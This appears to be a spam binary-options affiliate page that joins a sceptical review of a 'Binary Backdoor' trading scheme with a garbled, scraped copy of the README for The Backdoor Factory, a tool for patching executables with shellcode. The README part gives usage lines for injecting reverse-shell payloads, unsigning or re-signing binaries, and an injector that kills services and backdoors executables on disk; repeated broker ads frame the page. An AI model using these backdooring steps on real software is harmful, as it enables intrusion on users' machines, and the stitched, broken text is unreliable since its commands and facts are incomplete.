Binary Backdoor Review

Best Binary Options Brokers 2020:

    Top Broker!
    Best Choice For Beginners!
    Free Trading Education!
    Free Demo Account!
    Big Sign-up Bonus!


    Perfect For Experienced Traders!

Would You Open the Binary Backdoor to Let “Chad” Scam You?

Very interesting introduction asking us if we are looking for a performing binary software , not like the previous we probably have tried and did not work as advertised.But these previous software did work , actually.It is due to another variable that we face losses.The only problem though is that the owner is going to let only a few people to join this program.

It has to be done in that way , in order to minimise losses and run on full auto-pilot.Most importantly is going to run with an insane , almost illegal win rate.

With this Review I am Investigating the Binary Backdoor to find out if it is a Legitimate Opportunity or a Scam

Do you like to be bombarded with fancy headlines like these?

  • Want to buy the car of your dreams?
  • Want to buy a mansion that you deserve in a luxurious high society place on earth?
  • Want to travel first class and see the world?

And how come the “Video Voice” knows that I deserve all that?

More Exaggerated Claims – Screenshots of Bank Accounts – the Usual Menu

I won’t comment on how useless are these methods at this point.Let’s see what’s next … It is getting ridiculous already .. But why Tasos?

Do you really believe that this voice is not going to reveal his true identity because he is hiding? … people , come on.

The voice continues … he is using the cover up name “Chad Kowenski”.. Yeah , I believe you Chad.

The Old Recipe of a Horror Background Story

He’s been working for a large broker firm for the last 6 years.His job to contact people and convince them to deposit money into their trading accounts.For every trader’s deposit he was making a commission as a bonus.But unfortunately he only got 30 commissions for this very long period.About $7500 extra cash … Wait a minute pls … Oh yes , it stands as $250 for the deposit , just like I was expecting “Chad”.

This is the usual minimum deposit with a Binary broker.I am getting really bored here.

He discovered that all of his clients were trading for an average of 12 days only.He contacted them to find out “Why”..They told him that the software was not performing as it was supposed to.He passed that information to his colleague and he laughed

… Chad , it is not the software , WE are blocking their signals.The software get false signals from us to reduce their chances of winning.

Chad was shocked , paralysed.He could not believe it.He was working for a corrupted firm for so long and he did not even had a clue.It is very tough to feel guilty and it makes even tougher when it is not your fault.Chad is a hero , a real one.He was trying to recover the losses for his clients. A typical example of a Good-Man.

He managed to create a fake account while working at the company the next day.He tested the software from home and the next day he logged in at the office , he won 121 out of 149 trades.He felt “Ecstasy” running down his veins.There was a problem though.He could not withdraw that money as the account was fake.

$300K plus were about to vanish like dust in the wind.

Best Binary Options Brokers 2020:

    Top Broker!
    Best Choice For Beginners!
    Free Trading Education!
    Free Demo Account!
    Big Sign-up Bonus!


    Perfect For Experienced Traders!

The Backdoor Factory (BDF) – Patch Binaries With Shellcode

The Backdoor Factory or BDF is a tool which enables you to patch binaries with shellcode and continue normal execution exactly as the executable binary would have in its’ pre-patched state.

Some executables have built in protection, as such this tool will not work on all binaries. It is advisable that you test target binaries before deploying them to clients or using them in exercises.

There’s a couple of somewhat related tools you can also check out:

Features of Backdoor Factory

Overall BDF Features

  • Provide custom shellcode.
  • Patch a directory of executables/dlls.
  • Select x32 or x64 binaries to patch only.
  • Include BDF is other python projects see and
  • Can find all codecaves in an EXE/DLL.
  • By default, clears the pointer to the PE certificate table, thereby unsigning a binary.
  • Can inject shellcode into code caves or into a new section.
  • Can find if a PE binary needs to run with elevated privileges.
  • When selecting code caves, you can use the following commands:
    • Jump (j), for code cave jumping
    • Single (s), for patching all your shellcode into one cave
    • Append (a), for creating a code cave
    • Ignore (i or q), nevermind, ignore this binary
  • Can ignore DLLs
  • Import Table Patching
  • AutoPatching (-m automtic)
  • Onionduke (-m onionduke)

ELF Files Backdoor Feature

Extends 1000 bytes (in bytes) to the TEXT SEGMENT and injects shellcode into that section of code.

Mach-O Files

Pre-Text Section patching and signature removal

Binary Backdoor Review

GitHub is home to over 40 million developers working together to host and review code, manage projects, and build software together.

the-backdoor-factory /


The Backdoor Factory (BDF)

For security professionals and researchers only.

The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.

Black Hat USA 2020:

Contact the developer on:

Under a BSD 3 Clause License

####Dependences #####To use OnionDuke you MUST be on an intel machine because aPLib has no support for the ARM chipset yet.

Capstone engine can be installed from PyPi with:

Pefile, most recent:

osslsigncode (included in repo):


This will install Capstone with 3.01 pip to install pefile.

Some executables have built in protections, as such this will not work on all binaries. It is advisable that you test target binaries before deploying them to clients or using them in exercises. I’m on the verge of bypassing NSIS, so bypassing these checks will be included in the future.

Recently tested on many binaries.

./ -h Usage: [options]

###Mach-O Files Pre-Text Section patching and signature removal

###Patch an exe/dll using an existing code cave:

###Patch an exe/dll by adding a code section:

###Patch a directory of exes: ./ -d test/ -i -p 8080 -s reverse_shell_tcp -a . output too long for README.

###User supplied shellcode: msfpayload windows/exec CMD=’calc.exe’ R > calc.bin ./ -f psexec.exe -s user_supplied_shellcode -U calc.bin This will pop calc.exe on a target windows workstation. So 1337. Much pwn. Wow.

BDF can sign PE files if you have a codesigning cert. It uses osslsigncode. Put your signing cert and private key in the certs/ directory. Prep your certs using openssl commands from this blog post:

Put your private key password in a file (gasp) as so (exactly as so):

Name your certs EXACTLY as follows:

Your certs/ directory should look excatly as so:

Enable PE Code Signing with the -C flag as so:

On successful run you should see this line in BDF output:

###Hunt and backdoor: Injector | Windows Only The injector module will look for target executables to backdoor on disk. It will check to see if you have identified the target as a service, check to see if the process is running, kill the process and/or service, inject the executable with the shellcode, save the original file to either file.exe.old or another suffix of choice, and attempt to restart the process or service.
Edit the python dictionary “list_of_targets” in the ‘injector’ module for targets of your choosing.

  • Fix entry point truncation bug that led to improper recovery in rare instances
  • Support for dynamic paths in BDFProxy for preprocessor
  • Added the preprocessor and other optimizations
  • The preprocessor allows the user to modify the binary prior to payload injection
  • Invoke with the -p flag
  • See samples in ./preprocessor/
  • Added directory paths to BDF to find certs directory.
  • Bug fix in rsrc section for onionduke patching and remove of random win32 version value in PE Header
  • Added proper truncating of a PE file after signature pointer is cleared in PE header – e.g. proper unsigning. Resulting in better support for IAT patching
  • Fixed bug in IAT directory cave assignment that caused BDF crash
  • Made the feature optional with -A flag
  • Changed the Import Table Directory modifications from adding a new section to using an existing code cave

Added ‘replace’ PATCH_METHOD – a straight PE copy pasta of the supplied binary

More for usage with BDFProxy

Usage: ./ -f weee.exe -m replace -b supplied_binary.exe

  • Stability fix for auto cave selection for rare caves of overlap
  • BH USA UPDATES, w00t!
  • OnionDuke, use -m onionduke * Supports user supplied exe’s and dll’s * Usage: ./ -f originalfile.exe -m onionduke -b pentest.dll/exe
  • XP MODE = Prior IAT based payloads did not support XP, Wine, or Windows 98. If you need to support XP use the -X flag. I’m not supporting anything less than XP (and not XP x64).
  • Invoke UAC prompt to runas as admin. experimental – patches the PE manifest if requestedExecutionLevel exists.
  • Stability updates: * Fixed a bug with incorrect RVA calculation jmp’ing across 2+ code caves * Better checks to determine if a new section for the IAT will write into appended data and therefore fail
  • Speed Improvements: * Faster code cave finding while using automatic mode (-m automatic) * Faster rsrc parsing to find manifest file
  • Bug fix to the reverse_tcp_stager_threaded payload when using single caves payload

  • Adding check for Bound Imports (PE files with bound imports will not be patched)

So many updates:

Automatic patching for PE files (use -m automatic with a *_threaded payload)

New IAT payloads for x86/x64 PE files

####2/14/2020 I delay the payload for 30 seconds, main code runs right away.

Setting of firm capstone commit for building into BDF, capstone ‘Next’ repo breaks BDF.

Fixes to support cython capstone implementation null byte truncation issue

This script will output patched files in backdoored that will allow for the user to test the payloads as they wish. Each payload type increments the port used by one.

OS X Beaconing Payloads for x86 and x64: beaconing_reverse_shell_tcp

-B 15 –> set beacon time for 15 secs

Bug fix to support OS X for BDFProxy

PE UPX Patching Added

Mach-O x86/x64 added

x86 IAT payload optimization

Added support for ARM x32 LE ELF patching

Added FreeBSD x32 ELF patching support

Change to BSD 3 Clause License

During the process of adding Capstone, I removed about 500 lines of code. That’s pretty awesome.

Renamed loadliba_reverse_tcp to iat_reverse_tcp.

Small optimizations for speed.

Added a new win86 shellcode: loadliba_reverse_tcp

Best Binary Options Brokers 2020:

    Top Broker!
    Best Choice For Beginners!
    Free Trading Education!
    Free Demo Account!
    Big Sign-up Bonus!


    Perfect For Experienced Traders!

Like this post? Please share to your friends:
How To Choose Binary Options Broker 2020
Leave a Reply

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!: